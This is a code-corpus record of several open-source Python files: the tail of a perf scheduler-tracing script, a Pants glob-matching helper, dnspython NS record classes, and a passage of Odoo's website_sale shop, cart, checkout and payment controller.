next_comm, next_pid, next_prio):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 0)
def sched__sched_wait_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
ret):
pass
def sched__sched_kthread_stop(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid):
pass
def trace_unhandled(event_name, context, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
pass
|
gpl-2.0
|
pombredanne/pants
|
src/python/pants/source/filespec.py
|
4
|
1665
|
# coding=utf-8
# Copyright 2017 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import re
def glob_to_regex(pattern):
"""Given a glob pattern, return an equivalent regex expression.
:param string glob: The glob pattern. "**" matches 0 or more dirs recursively.
"*" only matches patterns in a single dir.
:returns: A regex string that matches same paths as the input glob does.
"""
out = ['^']
components = pattern.strip('/').replace('.', '[.]').replace('$','[$]').split('/')
doublestar = False
for component in components:
if len(out) == 1:
if pattern.startswith('/'):
out.append('/')
else:
if not doublestar:
out.append('/')
if '**' in component:
if component != '**':
raise ValueError('Invalid usage of "**", use "*" instead.')
if not doublestar:
out.append('(([^/]+/)*)')
doublestar = True
else:
out.append(component.replace('*', '[^/]*'))
doublestar = False
if doublestar:
out.append('[^/]*')
out.append('$')
return ''.join(out)
def globs_matches(path, patterns):
return any(re.match(glob_to_regex(pattern), path) for pattern in patterns)
def matches_filespec(path, spec):
if spec is None:
return False
if not globs_matches(path, spec.get('globs', [])):
return False
for spec in spec.get('exclude', []):
if matches_filespec(path, spec):
return False
return True
|
apache-2.0
|
thekingofkings/focusread
|
libs/dns/rdtypes/nsbase.py
|
18
|
2851
|
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""NS-like base classes."""
from io import BytesIO
import dns.exception
import dns.rdata
import dns.name
class NSBase(dns.rdata.Rdata):
"""Base class for rdata that is like an NS record.
@ivar target: the target name of the rdata
@type target: dns.name.Name object"""
__slots__ = ['target']
def __init__(self, rdclass, rdtype, target):
super(NSBase, self).__init__(rdclass, rdtype)
self.target = target
def to_text(self, origin=None, relativize=True, **kw):
target = self.target.choose_relativity(origin, relativize)
return str(target)
@classmethod
def from_text(cls, rdclass, rdtype, tok, origin=None, relativize=True):
target = tok.get_name()
target = target.choose_relativity(origin, relativize)
tok.get_eol()
return cls(rdclass, rdtype, target)
def to_wire(self, file, compress=None, origin=None):
self.target.to_wire(file, compress, origin)
def to_digestable(self, origin=None):
return self.target.to_digestable(origin)
@classmethod
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin=None):
(target, cused) = dns.name.from_wire(wire[: current + rdlen],
current)
if cused != rdlen:
raise dns.exception.FormError
if origin is not None:
target = target.relativize(origin)
return cls(rdclass, rdtype, target)
def choose_relativity(self, origin=None, relativize=True):
self.target = self.target.choose_relativity(origin, relativize)
class UncompressedNS(NSBase):
"""Base class for rdata that is like an NS record, but whose name
is not compressed when convert to DNS wire format, and whose
digestable form is not downcased."""
def to_wire(self, file, compress=None, origin=None):
super(UncompressedNS, self).to_wire(file, None, origin)
def to_digestable(self, origin=None):
f = BytesIO()
self.to_wire(f, None, origin)
return f.getvalue()
|
mit
|
hanicker/odoo
|
addons/website_sale/controllers/main.py
|
20
|
43301
|
# -*- coding: utf-8 -*-
import werkzeug
from openerp import SUPERUSER_ID
from openerp import http
from openerp.http import request
from openerp.tools.translate import _
from openerp.addons.website.models.website import slug
from openerp.addons.web.controllers.main import login_redirect
PPG = 20 # Products Per Page
PPR = 4 # Products Per Row
class table_compute(object):
def __init__(self):
self.table = {}
def _check_place(self, posx, posy, sizex, sizey):
res = True
for y in range(sizey):
for x in range(sizex):
if posx+x>=PPR:
res = False
break
row = self.table.setdefault(posy+y, {})
if row.setdefault(posx+x) is not None:
res = False
break
for x in range(PPR):
self.table[posy+y].setdefault(x, None)
return res
def process(self, products):
# Compute products positions on the grid
minpos = 0
index = 0
maxy = 0
for p in products:
x = min(max(p.website_size_x, 1), PPR)
y = min(max(p.website_size_y, 1), PPR)
if index>=PPG:
x = y = 1
pos = minpos
while not self._check_place(pos%PPR, pos/PPR, x, y):
pos += 1
# if 21st products (index 20) and the last line is full (PPR products in it), break
# (pos + 1.0) / PPR is the line where the product would be inserted
# maxy is the number of existing lines
# + 1.0 is because pos begins at 0, thus pos 20 is actually the 21st block
# and to force python to not round the division operation
if index >= PPG and ((pos + 1.0) / PPR) > maxy:
break
if x==1 and y==1: # simple heuristic for CPU optimization
minpos = pos/PPR
for y2 in range(y):
for x2 in range(x):
self.table[(pos/PPR)+y2][(pos%PPR)+x2] = False
self.table[pos/PPR][pos%PPR] = {
'product': p, 'x':x, 'y': y,
'class': " ".join(map(lambda x: x.html_class or '', p.website_style_ids))
}
if index<=PPG:
maxy=max(maxy,y+(pos/PPR))
index += 1
# Format table according to HTML needs
rows = self.table.items()
rows.sort()
rows = map(lambda x: x[1], rows)
for col in range(len(rows)):
cols = rows[col].items()
cols.sort()
x += len(cols)
rows[col] = [c for c in map(lambda x: x[1], cols) if c != False]
return rows
# TODO keep with input type hidden
class QueryURL(object):
def __init__(self, path='', **args):
self.path = path
self.args = args
def __call__(self, path=None, **kw):
if not path:
path = self.path
for k,v in self.args.items():
kw.setdefault(k,v)
l = []
for k,v in kw.items():
if v:
if isinstance(v, list) or isinstance(v, set):
l.append(werkzeug.url_encode([(k,i) for i in v]))
else:
l.append(werkzeug.url_encode([(k,v)]))
if l:
path += '?' + '&'.join(l)
return path
def get_pricelist():
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
sale_order = context.get('sale_order')
if sale_order:
pricelist = sale_order.pricelist_id
else:
partner = pool['res.users'].browse(cr, SUPERUSER_ID, uid, context=context).partner_id
pricelist = partner.property_product_pricelist
return pricelist
class website_sale(http.Controller):
def get_pricelist(self):
return get_pricelist()
def get_attribute_value_ids(self, product):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
currency_obj = pool['res.currency']
attribute_value_ids = []
visible_attrs = set(l.attribute_id.id
for l in product.attribute_line_ids
if len(l.value_ids) > 1)
if request.website.pricelist_id.id != context['pricelist']:
website_currency_id = request.website.currency_id.id
currency_id = self.get_pricelist().currency_id.id
for p in product.product_variant_ids:
price = currency_obj.compute(cr, uid, website_currency_id, currency_id, p.lst_price)
attribute_value_ids.append([p.id, [v.id for v in p.attribute_value_ids if v.attribute_id.id in visible_attrs], p.price, price])
else:
attribute_value_ids = [[p.id, [v.id for v in p.attribute_value_ids if v.attribute_id.id in visible_attrs], p.price, p.lst_price]
for p in product.product_variant_ids]
return attribute_value_ids
def _get_search_domain(self, search, category, attrib_values):
domain = request.website.sale_product_domain()
if search:
for srch in search.split(" "):
domain += [
'|', '|', '|', ('name', 'ilike', srch), ('description', 'ilike', srch),
('description_sale', 'ilike', srch), ('product_variant_ids.default_code', 'ilike', srch)]
if category:
domain += [('public_categ_ids', 'child_of', int(category))]
if attrib_values:
attrib = None
ids = []
for value in attrib_values:
if not attrib:
attrib = value[0]
ids.append(value[1])
elif value[0] == attrib:
ids.append(value[1])
else:
domain += [('attribute_line_ids.value_ids', 'in', ids)]
attrib = value[0]
ids = [value[1]]
if attrib:
domain += [('attribute_line_ids.value_ids', 'in', ids)]
return domain
@http.route([
'/shop',
'/shop/page/<int:page>',
'/shop/category/<model("product.public.category"):category>',
'/shop/category/<model("product.public.category"):category>/page/<int:page>'
], type='http', auth="public", website=True)
def shop(self, page=0, category=None, search='', **post):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
attrib_list = request.httprequest.args.getlist('attrib')
attrib_values = [map(int, v.split("-")) for v in attrib_list if v]
attrib_set = set([v[1] for v in attrib_values])
domain = self._get_search_domain(search, category, attrib_values)
keep = QueryURL('/shop', category=category and int(category), search=search, attrib=attrib_list)
if not context.get('pricelist'):
pricelist = self.get_pricelist()
context['pricelist'] = int(pricelist)
else:
pricelist = pool.get('product.pricelist').browse(cr, uid, context['pricelist'], context)
product_obj = pool.get('product.template')
url = "/shop"
product_count = product_obj.search_count(cr, uid, domain, context=context)
if search:
post["search"] = search
if category:
category = pool['product.public.category'].browse(cr, uid, int(category), context=context)
url = "/shop/category/%s" % slug(category)
if attrib_list:
post['attrib'] = attrib_list
pager = request.website.pager(url=url, total=product_count, page=page, step=PPG, scope=7, url_args=post)
product_ids = product_obj.search(cr, uid, domain, limit=PPG, offset=pager['offset'], order='website_published desc, website_sequence desc', context=context)
products = product_obj.browse(cr, uid, product_ids, context=context)
style_obj = pool['product.style']
style_ids = style_obj.search(cr, uid, [], context=context)
styles = style_obj.browse(cr, uid, style_ids, context=context)
category_obj = pool['product.public.category']
category_ids = category_obj.search(cr, uid, [('parent_id', '=', False)], context=context)
categs = category_obj.browse(cr, uid, category_ids, context=context)
attributes_obj = request.registry['product.attribute']
attributes_ids = attributes_obj.search(cr, uid, [], context=context)
attributes = attributes_obj.browse(cr, uid, attributes_ids, context=context)
from_currency = pool.get('product.price.type')._get_field_currency(cr, uid, 'list_price', context)
to_currency = pricelist.currency_id
compute_currency = lambda price: pool['res.currency']._compute(cr, uid, from_currency, to_currency, price, context=context)
values = {
'search': search,
'category': category,
'attrib_values': attrib_values,
'attrib_set': attrib_set,
'pager': pager,
'pricelist': pricelist,
'products': products,
'bins': table_compute().process(products),
'rows': PPR,
'styles': styles,
'categories': categs,
'attributes': attributes,
'compute_currency': compute_currency,
'keep': keep,
'style_in_product': lambda style, product: style.id in [s.id for s in product.website_style_ids],
'attrib_encode': lambda attribs: werkzeug.url_encode([('attrib',i) for i in attribs]),
}
return request.website.render("website_sale.products", values)
@http.route(['/shop/product/<model("product.template"):product>'], type='http', auth="public", website=True)
def product(self, product, category='', search='', **kwargs):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
category_obj = pool['product.public.category']
template_obj = pool['product.template']
context.update(active_id=product.id)
if category:
category = category_obj.browse(cr, uid, int(category), context=context)
category = category if category.exists() else False
attrib_list = request.httprequest.args.getlist('attrib')
attrib_values = [map(int,v.split("-")) for v in attrib_list if v]
attrib_set = set([v[1] for v in attrib_values])
keep = QueryURL('/shop', category=category and category.id, search=search, attrib=attrib_list)
category_ids = category_obj.search(cr, uid, [], context=context)
category_list = category_obj.name_get(cr, uid, category_ids, context=context)
category_list = sorted(category_list, key=lambda category: category[1])
pricelist = self.get_pricelist()
from_currency = pool.get('product.price.type')._get_field_currency(cr, uid, 'list_price', context)
to_currency = pricelist.currency_id
compute_currency = lambda price: pool['res.currency']._compute(cr, uid, from_currency, to_currency, price, context=context)
if not context.get('pricelist'):
context['pricelist'] = int(self.get_pricelist())
product = template_obj.browse(cr, uid, int(product), context=context)
values = {
'search': search,
'category': category,
'pricelist': pricelist,
'attrib_values': attrib_values,
'compute_currency': compute_currency,
'attrib_set': attrib_set,
'keep': keep,
'category_list': category_list,
'main_object': product,
'product': product,
'get_attribute_value_ids': self.get_attribute_value_ids
}
return request.website.render("website_sale.product", values)
@http.route(['/shop/product/comment/<int:product_template_id>'], type='http', auth="public", website=True)
def product_comment(self, product_template_id, **post):
if not request.session.uid:
return login_redirect()
cr, uid, context = request.cr, request.uid, request.context
if post.get('comment'):
request.registry['product.template'].message_post(
cr, uid, product_template_id,
body=post.get('comment'),
type='comment',
subtype='mt_comment',
context=dict(context, mail_create_nosubscribe=True))
return werkzeug.utils.redirect('/shop/product/%s#comments' % product_template_id)
@http.route(['/shop/pricelist'], type='http', auth="public", website=True)
def pricelist(self, promo, **post):
cr, uid, context = request.cr, request.uid, request.context
request.website.sale_get_order(code=promo, context=context)
return request.redirect("/shop/cart")
@http.route(['/shop/cart'], type='http', auth="public", website=True)
def cart(self, **post):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
order = request.website.sale_get_order()
if order:
from_currency = pool.get('product.price.type')._get_field_currency(cr, uid, 'list_price', context)
to_currency = order.pricelist_id.currency_id
compute_currency = lambda price: pool['res.currency']._compute(cr, uid, from_currency, to_currency, price, context=context)
else:
compute_currency = lambda price: price
values = {
'order': order,
'compute_currency': compute_currency,
'suggested_products': [],
}
if order:
_order = order
if not context.get('pricelist'):
_order = order.with_context(pricelist=order.pricelist_id.id)
values['suggested_products'] = _order._cart_accessories()
return request.website.render("website_sale.cart", values)
@http.route(['/shop/cart/update'], type='http', auth="public", methods=['POST'], website=True)
def cart_update(self, product_id, add_qty=1, set_qty=0, **kw):
cr, uid, context = request.cr, request.uid, request.context
request.website.sale_get_order(force_create=1)._cart_update(product_id=int(product_id), add_qty=float(add_qty), set_qty=float(set_qty))
return request.redirect("/shop/cart")
@http.route(['/shop/cart/update_json'], type='json', auth="public", methods=['POST'], website=True)
def cart_update_json(self, product_id, line_id, add_qty=None, set_qty=None, display=True):
order = request.website.sale_get_order(force_create=1)
if order.state != 'draft':
request.website.sale_reset()
return {}
value = order._cart_update(product_id=product_id, line_id=line_id, add_qty=add_qty, set_qty=set_qty)
if not order.cart_quantity:
request.website.sale_reset()
return {}
if not display:
return None
value['cart_quantity'] = order.cart_quantity
value['website_sale.total'] = request.website._render("website_sale.total", {
'website_sale_order': request.website.sale_get_order()
})
return value
#------------------------------------------------------
# Checkout
#------------------------------------------------------
def checkout_redirection(self, order):
cr, uid, context, registry = request.cr, request.uid, request.context, request.registry
# must have a draft sale order with lines at this point, otherwise reset
if not order or order.state != 'draft':
request.session['sale_order_id'] = None
request.session['sale_transaction_id'] = None
return request.redirect('/shop')
# if transaction pending / done: redirect to confirmation
tx = context.get('website_sale_transaction')
if tx and tx.state != 'draft':
return request.redirect('/shop/payment/confirmation/%s' % order.id)
def checkout_values(self, data=None):
cr, uid, context, registry = request.cr, request.uid, request.context, request.registry
orm_partner = registry.get('res.partner')
orm_user = registry.get('res.users')
orm_country = registry.get('res.country')
state_orm = registry.get('res.country.state')
country_ids = orm_country.search(cr, SUPERUSER_ID, [], context=context)
countries = orm_country.browse(cr, SUPERUSER_ID, country_ids, context)
states_ids = state_orm.search(cr, SUPERUSER_ID, [], context=context)
states = state_orm.browse(cr, SUPERUSER_ID, states_ids, context)
partner = orm_user.browse(cr, SUPERUSER_ID, request.uid, context).partner_id
order = None
shipping_id = None
shipping_ids = []
checkout = {}
if not data:
if request.uid != request.website.user_id.id:
checkout.update( self.checkout_parse("billing", partner) )
shipping_ids = orm_partner.search(cr, SUPERUSER_ID, [("parent_id", "=", partner.id), ('type', "=", 'delivery')], context=context)
else:
order = request.website.sale_get_order(force_create=1, context=context)
if order.partner_id:
domain = [("partner_id", "=", order.partner_id.id)]
user_ids = request.registry['res.users'].search(cr, SUPERUSER_ID, domain, context=dict(context or {}, active_test=False))
if not user_ids or request.website.user_id.id not in user_ids:
checkout.update( self.checkout_parse("billing", order.partner_id) )
else:
checkout = self.checkout_parse('billing', data)
try:
shipping_id = int(data["shipping_id"])
except ValueError:
pass
if shipping_id == -1:
checkout.update(self.checkout_parse('shipping', data))
if shipping_id is None:
if not order:
order = request.website.sale_get_order(context=context)
if order and order.partner_shipping_id:
shipping_id = order.partner_shipping_id.id
shipping_ids = list(set(shipping_ids) - set([partner.id]))
if shipping_id == partner.id:
shipping_id = 0
elif shipping_id > 0 and shipping_id not in shipping_ids:
shipping_ids.append(shipping_id)
elif shipping_id is None and shipping_ids:
shipping_id = shipping_ids[0]
ctx = dict(context, show_address=1)
shippings = []
if shipping_ids:
shippings = shipping_ids and orm_partner.browse(cr, SUPERUSER_ID, list(shipping_ids), ctx) or []
if shipping_id > 0:
shipping = orm_partner.browse(cr, SUPERUSER_ID, shipping_id, ctx)
checkout.update( self.checkout_parse("shipping", shipping) )
checkout['shipping_id'] = shipping_id
# Default search by user country
if not checkout.get('country_id'):
country_code = request.session['geoip'].get('country_code')
if country_code:
country_ids = request.registry.get('res.country').search(cr, uid, [('code', '=', country_code)], context=context)
if country_ids:
checkout['country_id'] = country_ids[0]
values = {
'countries': countries,
'states': states,
'checkout': checkout,
'shipping_id': partner.id != shipping_id and shipping_id or 0,
'shippings': shippings,
'error': {},
'has_check_vat': hasattr(registry['res.partner'], 'check_vat')
}
return values
mandatory_billing_fields = ["name", "phone", "email", "street2", "city", "country_id"]
optional_billing_fields = ["street", "state_id", "vat", "vat_subjected", "zip"]
mandatory_shipping_fields = ["name", "phone", "street", "city", "country_id"]
optional_shipping_fields = ["state_id", "zip"]
def _get_mandatory_billing_fields(self):
return self.mandatory_billing_fields
def _get_optional_billing_fields(self):
return self.optional_billing_fields
def _get_mandatory_shipping_fields(self):
return self.mandatory_shipping_fields
def _get_optional_shipping_fields(self):
return self.optional_shipping_fields
def _post_prepare_query(self, query, data, address_type):
return query
def checkout_parse(self, address_type, data, remove_prefix=False):
""" data is a dict OR a partner browse record
"""
# set mandatory and optional fields
assert address_type in ('billing', 'shipping')
if address_type == 'billing':
all_fields = self._get_mandatory_billing_fields() + self._get_optional_billing_fields()
prefix = ''
else:
all_fields = self._get_mandatory_shipping_fields() + self._get_optional_shipping_fields()
prefix = 'shipping_'
# set data
if isinstance(data, dict):
query = dict((prefix + field_name, data[prefix + field_name])
for field_name in all_fields if prefix + field_name in data)
else:
query = dict((prefix + field_name, getattr(data, field_name))
for field_name in all_fields if getattr(data, field_name))
if address_type == 'billing' and data.parent_id:
query[prefix + 'street'] = data.parent_id.name
if query.get(prefix + 'state_id'):
query[prefix + 'state_id'] = int(query[prefix + 'state_id'])
if query.get(prefix + 'country_id'):
query[prefix + 'country_id'] = int(query[prefix + 'country_id'])
if query.get(prefix + 'vat'):
query[prefix + 'vat_subjected'] = True
query = self._post_prepare_query(query, data, address_type)
if not remove_prefix:
return query
return dict((field_name, data[prefix + field_name]) for field_name in all_fields if prefix + field_name in data)
def checkout_form_validate(self, data):
cr, uid, context, registry = request.cr, request.uid, request.context, request.registry
# Validation
error = dict()
for field_name in self._get_mandatory_billing_fields():
if not data.get(field_name):
error[field_name] = 'missing'
if data.get("vat") and hasattr(registry["res.partner"], "check_vat"):
if request.website.company_id.vat_check_vies:
# force full VIES online check
check_func = registry["res.partner"].vies_vat_check
else:
# quick and partial off-line checksum validation
check_func = registry["res.partner"].simple_vat_check
vat_country, vat_number = registry["res.partner"]._split_vat(data.get("vat"))
if not check_func(cr, uid, vat_country, vat_number, context=None): # simple_vat_check
error["vat"] = 'error'
if data.get("shipping_id") == -1:
for field_name in self._get_mandatory_shipping_fields():
field_name = 'shipping_' + field_name
if not data.get(field_name):
error[field_name] = 'missing'
return error
def _get_shipping_info(self, checkout):
shipping_info = {}
shipping_info.update(self.checkout_parse('shipping', checkout, True))
shipping_info['type'] = 'delivery'
return shipping_info
def checkout_form_save(self, checkout):
cr, uid, context, registry = request.cr, request.uid, request.context, request.registry
order = request.website.sale_get_order(force_create=1, context=context)
orm_partner = registry.get('res.partner')
orm_user = registry.get('res.users')
order_obj = request.registry.get('sale.order')
partner_lang = request.lang if request.lang in [lang.code for lang in request.website.language_ids] else None
billing_info = {'customer': True}
if partner_lang:
billing_info['lang'] = partner_lang
billing_info.update(self.checkout_parse('billing', checkout, True))
# set partner_id
partner_id = None
if request.uid != request.website.user_id.id:
partner_id = orm_user.browse(cr, SUPERUSER_ID, uid, context=context).partner_id.id
elif order.partner_id:
user_ids = request.registry['res.users'].search(cr, SUPERUSER_ID,
[("partner_id", "=", order.partner_id.id)], context=dict(context or {}, active_test=False))
if not user_ids or request.website.user_id.id not in user_ids:
partner_id = order.partner_id.id
# save partner informations
if partner_id and request.website.partner_id.id != partner_id:
orm_partner.write(cr, SUPERUSER_ID, [partner_id], billing_info, context=context)
else:
# create partner
partner_id = orm_partner.create(cr, SUPERUSER_ID, billing_info, context=context)
# create a new shipping partner
if checkout.get('shipping_id') == -1:
shipping_info = self._get_shipping_info(checkout)
if partner_lang:
shipping_info['lang'] = partner_lang
shipping_info['parent_id'] = partner_id
checkout['shipping_id'] = orm_partner.create(cr, SUPERUSER_ID, shipping_info, context)
order_info = {
'partner_id': partner_id,
'message_follower_ids': [(4, partner_id), (3, request.website.partner_id.id)],
'partner_invoice_id': partner_id,
}
order_info.update(order_obj.onchange_partner_id(cr, SUPERUSER_ID, [], partner_id, context=context)['value'])
address_change = order_obj.onchange_delivery_id(cr, SUPERUSER_ID, [], order.company_id.id, partner_id,
checkout.get('shipping_id'), None, context=context)['value']
order_info.update(address_change)
if address_change.get('fiscal_position'):
fiscal_update = order_obj.onchange_fiscal_position(cr, SUPERUSER_ID, [], address_change['fiscal_position'],
[(4, l.id) for l in order.order_line], context=None)['value']
order_info.update(fiscal_update)
order_info.pop('user_id')
order_info.update(partner_shipping_id=checkout.get('shipping_id') or partner_id)
order_obj.write(cr, SUPERUSER_ID, [order.id], order_info, context=context)
@http.route(['/shop/checkout'], type='http', auth="public", website=True)
def checkout(self, **post):
cr, uid, context = request.cr, request.uid, request.context
order = request.website.sale_get_order(force_create=1, context=context)
redirection = self.checkout_redirection(order)
if redirection:
return redirection
values = self.checkout_values()
return request.website.render("website_sale.checkout", values)
@http.route(['/shop/confirm_order'], type='http', auth="public", website=True)
def confirm_order(self, **post):
cr, uid, context, registry = request.cr, request.uid, request.context, request.registry
order = request.website.sale_get_order(context=context)
if not order:
return request.redirect("/shop")
redirection = self.checkout_redirection(order)
if redirection:
return redirection
values = self.checkout_values(post)
values["error"] = self.checkout_form_validate(values["checkout"])
if values["error"]:
return request.website.render("website_sale.checkout", values)
self.checkout_form_save(values["checkout"])
request.session['sale_last_order_id'] = order.id
request.website.sale_get_order(update_pricelist=True, context=context)
return request.redirect("/shop/payment")
#------------------------------------------------------
# Payment
#------------------------------------------------------
@http.route(['/shop/payment'], type='http', auth="public", website=True)
def payment(self, **post):
""" Payment step. This page proposes several payment means based on available
payment.acquirer. State at this point :
- a draft sale order with lines; otherwise, clean context / session and
back to the shop
- no transaction in context / session, or only a draft one, if the customer
did go to a payment.acquirer website but closed the tab without
paying / canceling
"""
cr, uid, context = request.cr, request.uid, request.context
payment_obj = request.registry.get('payment.acquirer')
sale_order_obj = request.registry.get('sale.order')
order = request.website.sale_get_order(context=context)
redirection = self.checkout_redirection(order)
if redirection:
return redirection
shipping_partner_id = False
if order:
if order.partner_shipping_id.id:
shipping_partner_id = order.partner_shipping_id.id
else:
shipping_partner_id = order.partner_invoice_id.id
values = {
'order': request.registry['sale.order'].browse(cr, SUPERUSER_ID, order.id, context=context)
}
values['errors'] = sale_order_obj._get_errors(cr, uid, order, context=context)
values.update(sale_order_obj._get_website_data(cr, uid, order, context))
# fetch all registered payment means
# if tx:
# acquirer_ids = [tx.acquirer_id.id]
# else:
if not values['errors']:
acquirer_ids = payment_obj.search(cr, SUPERUSER_ID, [('website_published', '=', True), ('company_id', '=', order.company_id.id)], context=context)
values['acquirers'] = list(payment_obj.browse(cr, uid, acquirer_ids, context=context))
render_ctx = dict(context, submit_class='btn btn-primary', submit_txt=_('Pay Now'))
for acquirer in values['acquirers']:
acquirer.button = payment_obj.render(
cr, SUPERUSER_ID, acquirer.id,
order.name,
order.amount_total,
order.pricelist_id.currency_id.id,
partner_id=shipping_partner_id,
tx_values={
'return_url': '/shop/payment/validate',
},
context=render_ctx)
return request.website.render("website_sale.payment", values)
@http.route(['/shop/payment/transaction/<int:acquirer_id>'], type='json', auth="public", website=True)
def payment_transaction(self, acquirer_id):
""" Json method that creates a payment.transaction, used to create a
transaction when the user clicks on 'pay now' button. After having
created the transaction, the event continues and the user is redirected
to the acquirer website.
:param int acquirer_id: id of a payment.acquirer record. If not set the
user is redirected to the checkout page
"""
cr, uid, context = request.cr, request.uid, request.context
transaction_obj = request.registry.get('payment.transaction')
order = request.website.sale_get_order(context=context)
if not order or not order.order_line or acquirer_id is None:
return request.redirect("/shop/checkout")
assert order.partner_id.id != request.website.partner_id.id
# find an already existing transaction
tx = request.website.sale_get_transaction()
if tx:
if tx.state == 'draft': # button cliked but no more info -> rewrite on tx or create a new one ?
tx.write({
'acquirer_id': acquirer_id,
'amount': order.amount_total,
})
tx_id = tx.id
else:
tx_id = transaction_obj.create(cr, SUPERUSER_ID, {
'acquirer_id': acquirer_id,
'type': 'form',
'amount': order.amount_total,
'currency_id': order.pricelist_id.currency_id.id,
'partner_id': order.partner_id.id,
'partner_country_id': order.partner_id.country_id.id,
'reference': order.name,
'sale_order_id': order.id,
}, context=context)
request.session['sale_transaction_id'] = tx_id
# update quotation
request.registry['sale.order'].write(
cr, SUPERUSER_ID, [order.id], {
'payment_acquirer_id': acquirer_id,
'payment_tx_id': request.session['sale_transaction_id']
}, context=context)
return tx_id
@http.route('/shop/payment/get_status/<int:sale_order_id>', type='json', auth="public", website=True)
def payment_get_status(self, sale_order_id, **post):
cr, uid, context = request.cr, request.uid, request.context
order = request.registry['sale.order'].browse(cr, SUPERUSER_ID, sale_order_id, context=context)
assert order.id == request.session.get('sale_last_order_id')
if not order:
return {
'state': 'error',
'message': '<p>%s</p>' % _('There seems to be an error with your request.'),
}
tx_ids = request.registry['payment.transaction'].search(
cr, SUPERUSER_ID, [
'|', ('sale_order_id', '=', order.id), ('reference', '=', order.name)
], context=context)
if not tx_ids:
if order.amount_total:
return {
'state': 'error',
'message': '<p>%s</p>' % _('There seems to be an error with your request.'),
}
else:
state = 'done'
message = ""
validation = None
else:
tx = request.registry['payment.transaction'].browse(cr, SUPERUSER_ID, tx_ids[0], context=context)
state = tx.state
if state == 'done':
message = '<p>%s</p>' % _('Your payment has been received.')
elif state == 'cancel':
message = '<p>%s</p>' % _('The payment seems to have been canceled.')
elif state == 'pending' and tx.acquirer_id.validation == 'manual':
message = '<p>%s</p>' % _('Your transaction is waiting confirmation.')
if tx.acquirer_id.post_msg:
message += tx.acquirer_id.post_msg
elif state == 'error':
message = '<p>%s</p>' % _('An error occurred during the transaction.')
validation = tx.acquirer_id.validation
return {
'state': state,
'message': message,
'validation': validation
}
@http.route('/shop/payment/validate', type='http', auth="public", website=True)
def payment_validate(self, transaction_id=None, sale_order_id=None, **post):
""" Method that should be called by the server when receiving an update
for a transaction. State at this point :
- UDPATE ME
"""
cr, uid, context = request.cr, request.uid, request.context
email_act = None
sale_order_obj = request.registry['sale.order']
if transaction_id is None:
tx = request.website.sale_get_transaction()
else:
tx = request.registry['payment.transaction'].browse(cr, uid, transaction_id, context=context)
if sale_order_id is None:
order = request.website.sale_get_order(context=context)
else:
order = request.registry['sale.order'].browse(cr, SUPERUSER_ID, sale_order_id, context=context)
assert order.id == request.session.get('sale_last_order_id')
if not order or (order.amount_total and not tx):
return request.redirect('/shop')
if (not order.amount_total and not tx) or tx.state in ['pending', 'done']:
if (not order.amount_total and not tx):
# Orders are confirmed by payment transactions, but there is none for free orders,
# (e.g. free events), so confirm immediately
order.with_context(dict(context, send_email=True)).action_button_confirm()
elif tx and tx.state == 'cancel':
# cancel the quotation
sale_order_obj.action_cancel(cr, SUPERUSER_ID, [order.id], context=request.context)
# clean context and session, then redirect to the confirmation page
request.website.sale_reset(context=context)
if tx and tx.state == 'draft':
return request.redirect('/shop')
return request.redirect('/shop/confirmation')
@http.route(['/shop/confirmation'], type='http', auth="public", website=True)
def payment_confirmation(self, **post):
""" End of checkout process controller. Confirmation is basically seing
the status of a sale.order. State at this point :
- should not have any context / session info: clean them
- take a sale.order id, because we request a sale.order and are not
session dependant anymore
"""
cr, uid, context = request.cr, request.uid, request.context
sale_order_id = request.session.get('sale_last_order_id')
if sale_order_id:
order = request.registry['sale.order'].browse(cr, SUPERUSER_ID, sale_order_id, context=context)
else:
return request.redirect('/shop')
return request.website.render("website_sale.confirmation", {'order': order})
#------------------------------------------------------
# Edit
#------------------------------------------------------
@http.route(['/shop/add_product'], type='http', auth="user", methods=['POST'], website=True)
def add_product(self, name=None, category=0, **post):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
if not name:
name = _("New Product")
product_obj = request.registry.get('product.product')
product_id = product_obj.create(cr, uid, { 'name': name, 'public_categ_ids': category }, context=context)
product = product_obj.browse(cr, uid, product_id, context=context)
return request.redirect("/shop/product/%s?enable_editor=1" % slug(product.product_tmpl_id))
@http.route(['/shop/change_styles'], type='json', auth="public")
